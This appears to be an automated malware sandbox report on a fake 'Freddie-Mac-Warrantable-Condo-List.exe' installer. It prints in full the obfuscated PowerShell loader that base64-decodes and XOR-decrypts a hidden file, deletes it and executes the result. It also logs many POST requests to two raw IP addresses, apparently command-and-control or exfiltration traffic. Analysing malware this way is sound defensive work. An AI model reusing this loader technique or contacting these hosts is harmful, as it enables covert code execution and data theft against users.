/SL5='$90236,102634141,825344,C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp, ParentProcessId: 5344, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe

Data Obfuscation:

Sigma detected: Powershell Decrypt And Execute Base64 Data

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;', CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp' /SL5='$90236,102634141,825344,C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp, ParentProcessId: 5344, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: Freddie-Mac-Warrantable-Condo-List.exe

Virustotal: Detection: 15%

Perma Link

Source: Freddie-Mac-Warrantable-Condo-List.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED

Source: Freddie-Mac-Warrantable-Condo-List.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_0040AEF4 FindFirstFileW,FindClose,	1_2_0040AEF4
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	1_2_0040A928
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: 5_2_0060C2B0 FindFirstFileW,GetLastError,	5_2_0060C2B0
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: 5_2_0040E6A0 FindFirstFileW,FindClose,	5_2_0040E6A0
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: 5_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	5_2_0040E0D4
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: 5_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,	5_2_006B8DE4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 401Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 259
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 304
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 677
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 304Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 446
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 446
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 586Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 729
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 261
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 466Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 608
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 609
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 340
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 444
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 427
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 301
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 410
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 612
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 327
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 660
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 588
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 671
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 691
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 427
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 281
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 626
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 290
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 704
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 551
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 515
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 268
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 300
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 298
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 745
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 605Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 721
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 729
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 244
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 438Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 351
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 704
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 509
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 261
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 547
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 290
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 664
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 451
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 706
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 561
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 572
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 375
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 688
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 555
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 461
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 639
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 589
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 479
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 544
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 738
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 392
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 338Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 654
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 649
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 619
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 737
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 254
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 281
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 433
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 554
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 710
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 537
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 238
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 302
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 728
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 475
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 558
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 629
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 631
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 451
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 483
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 236
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 270
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 319
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 321
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 617
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 392
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 290
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 585
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 180752
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 709Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 268Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 379
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 377
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 488
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 570
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 413
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 424
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 623Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 181018
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 292Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 180642Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 180952Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 754
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 369
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 180685Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 181069
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 181024Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 180951Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 180849Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 180994
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 180737
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 181076
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 181056
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 180855
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 180809Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 180635Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 180652
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 180817
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 181073
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 180652Data Raw: 38 0b 9e e0 9c 4d b9 cb 16 aa ab 1f f5 d7 94 d2 57 86 cb eb ad d1 0b 33 16 33 f6 c9 a3 44 e5 9e 4e 08 25 37 8b 28 ba 89 10 b0 fd f0 2b b2 10 46 77 86 97 14 a6 4a 7b 65 fe 6c cb 6a 56 ee 28 d1 c4 0e cf ed b2 5d 48 2f cb 43 db fb d3 1a 08 62 23 00 c3 99 be be b8 78 a9 ac 00 7b 0c f6 73 8b 95 76 54 66 03 75 a1 19 d1 2c f2 4d e6 d1 fe 2f 09 f5 15 e2 c3 b2 c8 e9 5d 58 5b 9b 47 2b 28 06 58 d8 5a 47 26 09 69 89 09 bc 13 1d 6c 5c 08 84 78 37 62 cf a6 47 03 d6 a5 6a e5 37 7e 16 50 36 b5 7d dc 79 09 e5 b1 4c 3a 8c b4 60 e8 97 f7 21 5c 16 3d d6 8c 20 54 c3 7a e9 66 29 3b 7d a2 d3 f0 7a 93 b1 fc fe 73 0d 4d be 19 31 00 04 30 d5 a9 4d 2b d0 80 98 14 b0 18 fa 37 ef ff 6b 78 8c 7b d7 c2 68 ba b2 89 97 5e 7f 62 44 b2 07 5d 82 44 46 ff 97 fc bf e3 26 d3 bb f7 8d cf 83 90 c3 60 87 ce 29 8e ea a3 2a a9 f8 8e 74 30 64 92 52 71 a1 f3 ff f5 1b 3f c2 50 83 61 26 67 da d7 b5 06 b2 59 20 3b 53 15 c5 40 1d 67 18 3f 8d 09 04 ce de 4f 4c 08 cb df 26 c8 89 db 09 1f 28 db 0c f1 a7 60 a0 c0 62 2a 98 8e f0 0a 82 00 0f a3 9f a5 e8 be fd 47 53 8b 8a 10 cd eb d4 0d c5 e4 9a 31 7e e6 c9 ad f8 e3 dd 34 b4 d8 e6 89 52 a2 82 38 da 52 9c 62 ef e3 f3 a9 f1 3b 42 41 79 82 0e 8c 22 0a 46 0b 8f 64 6a 0c f4 50 29 db 00 4a 74 0d bb 8e 8a fd f9 59 db 21 7f 9a 17 0f 50 e7 85 5c af 6e f9 97 9d 03 4f 1a 80 c3 92 d7 de 98 9b a4 c9 0c e9 f8 94 f1 9d ac 59 83 78 9a b6 68 d3 47 53 44 7b d6 0a 83 5b 55 49 07 6c 69 76 49 32 22 4a 5a a5 d1 ed 53 34 dc 0a 40 8f e1 51 f1 24 56 2e 19 66 b3 86 b2 4b ee b3 3e 10 67 c4 f9 23 a5 28 7c da f7 ad f6 91 72 71 67 f3 a9 f8 d0 12 15 89 e2 f0 04 3b e5 ea f1 29 b0 80 6d d0 b8 78 15 1c f4 23 d2 bb d0 7d 68 03 21 15 4f eb 42 24 85 9d 75 8b 25 25 2e ef 2b b9 7c f2 13 ae 44 c5 73 5b da 8c bf a8 a8 bc 8d 06 7e 50 13 c7 cc c7 7d c5 87 4a e2 ef 5e 7b 8e df 87 6c ce 0e 86 7e f9 17 e0 d9 6d 32 9c 19 47 3e e9 b6 5e cd 73 b3 7d 30 a6 64 1f 51 01 ec 60 26 74 2f 91 88 44 ae b2 a3 07 10 31 93 ca 27 ad e9 3e 45 1f 8b 87 ab 8f 20 dc 27 0d af ec c9 52 2c 70 46 2f 09 a5 ee 73 50 66 8f d6 e0 9a cb 71 7d 62 7b 24 d2 54 b1 c4 32 bb c3 eb f6 4b 56 53 14 6a 41 27 aa c1 0e d1 08 f7 7e 8d 35 dd b8 e0 fd 9d d6 e2 b6 8b a4 a3 66 7f bc e6 02 c3 6b 11 1b ee 81 7a a2 a7 b0 9c 16 c5 9a d7 62 fa 53 36 d7 98 af e9 22 fb 0e bb a9 5a 9f 2b d8 25 18 42 36 19 fc 8b 32 6d 54 6c 17 c4 74 f4 55 f7 20 05 a1 73 af 1c 98 3d ec 19 bd 60 27 2a 18 f5 39 42 2b a5 c0 be 60 8d 91 37 27 c3 a3 f7 8d ff bb 9a 01 45 61 0a 88 50 c2 50 35 dd 7c 3c 25 20 78 4b ab a7 26 50 2e 8d 41 65 fc fd 8c 53 d1 9e a3 08 bc cb 5c 02 da 19 d8 06 f4 76 f6 24 49 9b 05 e5 de e0 63 32 3e 40 cf 74 02 ea b9 b0 6e 35 52 2c 22 0d 66 75 0e d2 59 5c a6 5b 06 e7 20 52 b7 a2 ce ce 33 17 ed 73 43 a3 4f 63 53 d2 6b af 49 6b 9f ee 7a d7 79 0a f3 7d 77 00 9f 49 41 67 df 6a c5 f4 e1 8b 97 d5 18 8f ca 5d bc 4d d5 f6 13 bf 22 ef 88 2f 44 25 8b 55 50 75 1c 81 72 66 16 90 d1 db 58 92 95 1d 59 17 2b ec 70 e2 8e 86 04 dc 47 7f bc 87 64 cd 31 a1 76 b9 d6 51 0a 12 40 4e f9 22 ef 41 f9 7d c2
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 5.254.118.226Content-Length: 181073Data Raw: bc 32 1c a1 61 8c 77 fb 98 5b 9f 39 d4 6e 20 f0 e5 62 65 1f 23 d8 0e 20 cb c5 5a c5 63 f6 45 bf 4a f7 21 09 0b 2a 6d c9 bf 4a 8e de e2 b7 eb 11 5b 69 01 65 e1 fc d7 e2 25 fa d5 9a 32 b0 98 a1 16 df ee dc 4e 17 e5 bb f3 9b 5f d7 4a 2f 3d 15 d9 4a 6b f9 f5 df dc 4c 20 3d e3 0f 54 d2 97 0f b0 ec c8 04 c7 0f c1 44 82 44 70 47 9e 01 99 f4 be c0 bf e7 46 9e aa 35 03 a2 bc 12 33 d6 68 22 04 51 27 5d 65 39 4c ca 87 27 77 b2 6f 96 ac 20 a2 ed 50 92 13 ae c7 13 42 93 01 25 52 b0 11 aa db 4f 43 4e d8 3d 8f 85 75 f3 61 20 27 f7 c5 6c f4 9c 6f 44 87 d4 10 55 88 15 1c d0 39 27 79 d6 16 cb d5 21 53 5f 47 66 5e c9 1e 1e 4e a8 ea 49 cd 94 2f b4 42 cc 24 08 3f ed c4 c3 22 be 4d 4e 7b 8a 0a 5a 22 a5 19 96 56 09 e5 bd b6 f1 07 df 2a d1 04 a3 f6 c3 95 49 a8 ce e0 65 99 82 44 9f 7c ce a1 c3 9e 90 28 28 7c 98 5f 39 e5 65 50 4d e6 e3 9a 4f ba a9 56 b6 f3 bf b1 52 c3 b2 fb d2 c4 46 42 e7 50 43 42 98 aa da 28 5f 65 5d 62 43 7f 93 7e b5 e7 f3 e4 d2 78 ea ce dd de d4 64 c8 9b 8c 73 a0 24 68 fc a4 a2 03 a4 de 81 f6 52 97 5e 6e d2 31 35 47 e9 cf 61 6e 6f 64 73 63 b8 d4 77 5e c2 d8 e8 c1 20 18 96 d8 13 e5 50 06 51 81 99 37 80 70 02 33 94 55 a1 a3 3f b4 f8 98 31 3f 49 ce 68 24 34 78 ae 9b 4f bb 9a 5b 34 05 7f 5c 1e ec ca 3d e2 48 d3 44 c8 6d 38 45 82 6a 1e fc a8 d2 9d 80 9c 2d 4d 21 87 e3 22 46 98 39 22 9c 24 e2 97 0c cd f2 5c 01 fa 24 5a c6 41 6a 1a e3 9d 9d b2 60 67 fe be ef 9f aa b4 fd 27 8e ab 90 4c 9b 21 9e d2 13 2f b4 77 9d 85 78 d2 86 de 1e ca 3e a7 fa 86 c0 35 25 25 a6 6b 24 3f 5d d8 6d 78 c9 7a a5 49 7a 00 c3 99 be be b8 78 a9 ac 00 7b 38 20 3b 78 25 b5 64 9e 00 88 6a 9c 25 ec 7c 4d 60 5b fd 2a 8d c3 2a a2 bf ac 9f 3b 44 5e 0a 07 e0 d2 d5 c5 f9 0a 2a 1d 3b e6 17 8f 2c eb 7b a5 87 74 9b bd 5e e0 5c 64 25 dc 60 84 99 0e 94 96 01 86 5c 03 fe ef 9b 7e f7 84 50 5e a5 b1 03 cd b6 a4 81 5b 39 89 f3 a7 b3 55 39 22 da fa f2 da dd 96 9b 83 32 1c d4 ac 5c a7 11 76 b0 bd ce 8b 01 4f 66 03 ee bf 37 c0 4c b0 75 79 22 de 71 0c bf f8 b4 7e ec d6 f6 78 87 c3 0e 51 f6 c7 6e f5 86 bc 4d dd cd 3a 30 b7 28 3f 35 36 3f df 9c fe 99 60 d7 6a 76 fa 3c c3 c2 a9 13 0b c5 b3 61 19 65 2c e9 b2 35 b6 cc db 5f a4 c8 d2 52 cf 70 96 2b bd 27 bc ed 7e b0 7c 2d ed b1 9d 07 99 00 a0 e9 29 53 36 05 96 ab 37 ab 10 53 d0 d6 dc 38 13 6b 37 48 75 43 77 0f 14 e7 fc 72 5c a6 e3 3b e6 d5 3e 19 3a be 4c 28 e4 ab cf 4c 3c 81 79 82 e1 ac f3 cc b6 9f 78 ba 71 fc 54 e7 a2 1f a8 c9 ec 58 25 7c b8 11 7d 12 ec f8 f1 2d ac 29 e6 1e 8b 84 25 c1 42 69 d0 3f b9 4d 94 ca 2e 05 e5 9b 60 ce 31 06 6d d2 cc 87 b4 92 d8 09 fb 93 b0 5f 40 9a e7 38 cb 1b 03 75 5f a6 59 7c fe 0f 68 c5 31 f8 b9 2a ed 7c 27 27 9f 4c 00 1f 45 91 86 69 e5 1f 54 81 5c d6 a8 6d e1 f3 3b 5c 6c 66 2b 17 9e ed d1 2b 9b 83 cf f2 b7 85 38 c6 12 26 9a 60 e6 18 48 13 a3 d7 93 02 f5 a8 c6 2e 49 ba 8a a1 b5 90 08 fb 2f 78 54 23 de 59 8d ba 99 c2 13 db e8 14 fc 56 c5 f2 c1 5c 84 e8 66 10 7d 53 6a fe e1 c2 6d 63 7b 49 9a 71 1a c1 11 45 ae 89 b6 00 25 ed 8d 89 f4 77 9d dc 5c 05 b8 ee bd aa ae e3

Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
